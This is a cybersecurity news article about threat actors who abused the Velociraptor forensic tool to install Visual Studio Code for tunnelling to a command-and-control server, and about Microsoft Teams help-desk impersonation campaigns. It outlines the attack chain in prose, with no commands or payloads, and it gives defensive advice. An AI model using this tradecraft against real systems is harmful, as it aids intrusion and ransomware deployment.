Attackers Exploit Velociraptor Forensic Tool to Implement Visual Studio Code for Command and Control Tunneling
Cybersecurity researchers have highlighted a recent cyber attack involving the deployment of Velociraptor, an open-source endpoint monitoring and digital forensic tool, by unknown threat actors. This incident exemplifies the ongoing misuse of legitimate software for malicious purposes. According to the Sophos Counter Threat Unit Research Team, the attackers utilised Velociraptor to download and execute Visual Studio Code, likely intending to create a tunnel to an attacker-controlled Command-and-Control (C2) server. The use of Velociraptor indicates a tactical evolution in cyber attacks, where incident response tools are leveraged to gain a foothold, reducing the necessity for deploying custom malware. Further investigation revealed that the attackers employed the Windows msiexec utility to download an MSI installer from a Cloudflare Workers domain, which also served as a staging ground for additional tools, including a Cloudflare tunnelling tool and a remote administration utility known as Radmin.
The MSI file was designed to install Velociraptor, which subsequently established contact with another Cloudflare Workers domain. This access was then exploited to download Visual Studio Code from the same staging server using an encoded PowerShell command, executing the source code editor with the tunnel option enabled for remote access and code execution. The threat actors were also observed using the msiexec utility again to download further payloads from the workers[.]dev folder. Sophos advised organisations to monitor for and investigate any unauthorised use of Velociraptor, treating such observations as potential precursors to ransomware attacks. Implementing an endpoint detection and response system, monitoring for unexpected tools and suspicious behaviours, and adhering to best practices for system security and backup generation can help mitigate the ransomware threat. Concurrently, cybersecurity firms Hunters and Permiso reported on a malicious campaign leveraging Microsoft Teams for initial access, showcasing a trend of threat actors weaponising the platform’s trusted role in enterprise communications for malware deployment. These attacks typically commence with threat actors using newly created or compromised tenants to send direct messages or initiate calls, impersonating IT help desk teams or other trusted contacts to install remote access software like AnyDesk, DWAgent, or Quick Assist, thereby seizing control of victim systems to deliver malware.
Categories: Cyber Attack Techniques, Use of Legitimate Software for Malicious Purposes, Remote Access Tools
Tags: Cyber Attack, Velociraptor, Endpoint Monitoring, Command-and-Control, Living-off-the-Land, Remote Monitoring, MSI Installer, PowerShell, Ransomware, Microsoft Teams